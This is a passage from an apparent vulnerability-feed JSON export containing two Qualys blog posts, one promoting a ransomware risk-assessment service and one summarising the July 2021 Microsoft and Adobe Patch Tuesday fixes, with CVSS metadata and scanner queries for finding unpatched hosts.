or Secure Access Service Edge (SASE) for ransomware protection. Relying solely on detection and response tools, or even on a simple vulnerability management program is not an adequate defense. NIST Tip and Tactics for Dealing with ransomware suggests the basic defense requires a unified and automated approach to assessing internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), and detection of risky software and assets missing anti-malware solutions. This requires multiple security tools and has the potential to result in siloed views.\n\n### Assess & continuously monitor your ransomware risk, powered by Qualys Research\n\nTo help organizations assess risk from ransomware attacks, Qualys is offering a 60-day, no-cost service to provide clear and actionable insights into your organization's ransomware exposure, along with an automated remediation plan to reduce the risk of attacks. \n\nLeveraging the Qualys research team's expertly curated ransomware-specific vulnerabilities, misconfigurations, risky software list, the Qualys Ransomware Risk Assessment solution delivers a prioritized remediation plan that provides:\n\n * A unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure RDP, and detection of risky software in the datacenter environment along with alerting for assets missing anti-malware solutions\n * Accelerated remediation of ransomware exposures with zero-touch patching by continuously patching ransomware vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to keep software up to date\n * Communicate to executives the true risk associated with multiple ransomware attack vectors\n![](https://blog.qualys.com/wp-content/uploads/2021/09/qualys-ransomware-screenshot-1-1070x795.png) Figure 2: Qualys Ransomware Risk Assessment Service Dashboard\n\n### Learn more and see for yourself\n\nTo learn more about the research and how Ransomware Risk Assessment & Remediation Service would help reduce your risk to ransomware by joining the webinar, Combating Risk from Ransomware Attacks, on October 21 at 10 am PT. [Sign up now](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>)!\n\nSee the service yourself, and [try it at no-cost for 60 days](<https://www.qualys.com/forms/ransomware/>) to know your exposure and prescribed patch plan to reduce your ransomware risk.\n\n### Resources\n\n * [Ransomware Risk Assessment Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>)\n * Read the [technical blog](<https://blog.qualys.com/product-tech/2021/10/05/the-rise-of-ransomware>) on the Qualys Ransomware Risk Assessment solution. Learn, what it includes, unified dashboarding of your exposure to drive remediation.\n * [Register](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) for the _Combating Risk from Ransomware Attacks_ webinar\n * [Video](<https://vimeo.com/617379785>) on Ransomware Risk Assessment\n\n### References\n\n * [CISA Ransomware Prevention Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>)\n * [CSRC Ransomware Risk & Prevention](<https://csrc.nist.gov/projects/ransomware-protection-and-response>)\n * [Top Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>)\n * [CIS MS-ISAC Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>)\n * [CIS Guidelines for Preventing Risk of Ransomware](<https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "Assess Your Risk From Ransomware Attacks, Powered by Qualys Research", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1723", "CVE-2013-0431", "CVE-2013-1493", "CVE-2018-12808", "CVE-2019-1458", "CVE-2020-1472", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:25", "description": "### Microsoft Patch Tuesday \u2013 July 2021\n\nMicrosoft patched 117 vulnerabilities in their July 2021 Patch Tuesday release, and 13 of them are rated as critical severity.\n\n### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>) \u2013 Scripting Engine Memory Corruption Vulnerability\n\nThis is being actively exploited. The vulnerability allows an attacker to execute malicious code on a compromised website if a user browses to a specially crafted file on the website. The vendor has assigned a CVSSv3 base score of 6.8 and should be prioritized for patching.\n\n[CVE-2021-34494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34494>) - Windows DNS Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in Windows DNS Server (CVE-2021-34494). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 8.8 by the vendor. This is only exploitable to DNS servers only; however, it could allow remote code execution without user interaction.\n\n[CVE-2021-33780](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33780>) - Windows DNS Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in DNS Server (CVE-2021-33780). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 8.8 by the vendor.\n\n[CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>) - Windows Kernel Elevation of Privilege Vulnerability\n\nThis has been actively exploited and is assigned a CVSSv3 base score of 7.2 by the vendor. This should be prioritized for patching.\n\n[CVE-2021-34489](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34489>) \u2013 DirectWrite Remote Code Execution Vulnerability\n\nThe vulnerability allows an attacker to host a website that contains a specially crafted file designed to exploit the vulnerability. The vendor has assigned a CVSSv3 base score of 7.8 and should be prioritized for patching.\n\n**CVE-2021-34467, CVE-2021-34468** \u2013 Microsoft SharePoint Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing critical RCE vulnerabilities in SharePoint Server (CVE-2021-34467, CVE-2021-34468). These CVEs have a high likelihood of exploitability and are assigned a CVSSv3 base score of 7.1 by the vendor. Along with these patches, CVE-2021-34520 should be prioritized for patching.\n\n[CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nThis Patch Tuesday follows out-of-band updates released to fix remote code execution affecting Windows Print Spooler vulnerability, popularly known as PrintNightmare. While Microsoft had released updates to fix PrintNightmare vulnerability, it is important to ensure necessary configurations are set correctly. We also published a blog post on [how to remediate PrintNightmare using Qualys VMDR](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/07/microsoft-windows-print-spooler-rce-vulnerability-printnightmare-cve-2021-34527-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>).\n\n### Adobe Patch Tuesday \u2013 July 2021\n\nAdobe addressed 26 CVEs this Patch Tuesday, and 22 of them are rated as critical severity impacting Acrobat and Reader, Adobe Framemaker, Illustrator, Dimension, and Adobe Bridge products.\n\n### Discover Patch Tuesday Vulnerabilities in VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`50112` OR qid:`50113` OR qid:`91787` OR qid:`91788` OR qid:`91789` OR qid:`91790` OR qid:`91791` OR qid:`91792` OR qid:`91793` OR qid:`91794` OR qid:`91795` OR qid:`110386` OR qid:`110387` OR qid:`375700` OR qid:`375706` OR qid:`375707` OR qid:`375708` OR qid:`375713` OR qid:`375714` OR qid:`375715`)` \n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/patchTueJuly1-1070x602.png)\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n\n`(qid:`50112` OR qid:`50113` OR qid:`91787` OR qid:`91788` OR qid:`91789` OR qid:`91790` OR qid:`91791` OR qid:`91792` OR qid:`91793` OR qid:`91794` OR qid:`91795` OR qid:`110386` OR qid:`110387` OR qid:`375700` OR qid:`375706` OR qid:`375707` OR qid:`375708` OR qid:`375713` OR qid:`375714` OR qid:`375715`)` \n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/patchtueJuly2-1070x602.png)\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/494962>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Windows Print Spooler RCE Vulnerability\n * Kaseya Multiple Zero-Day Vulnerabilities\n * Sonicwall Buffer Overflow Vulnerability\n * Microsoft Patch Tuesday, July 2021\n * Adobe Patch Tuesday, July 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/494962>)\n\n[![](https://blog.qualys.com/wp-content/uploads/2021/07/This-Month-in-Vulnerabilities-and-Patches-Webinar-Desktop-1070x465.png)](<https://www.brighttalk.com/webcast/11673/494962>)Webinar July 15, 2021 or on demand.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://success.qualys.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T19:49:37", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (July 2021) \u2013 Microsoft 117 Vulnerabilities with 13 Critical, Adobe 26 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false,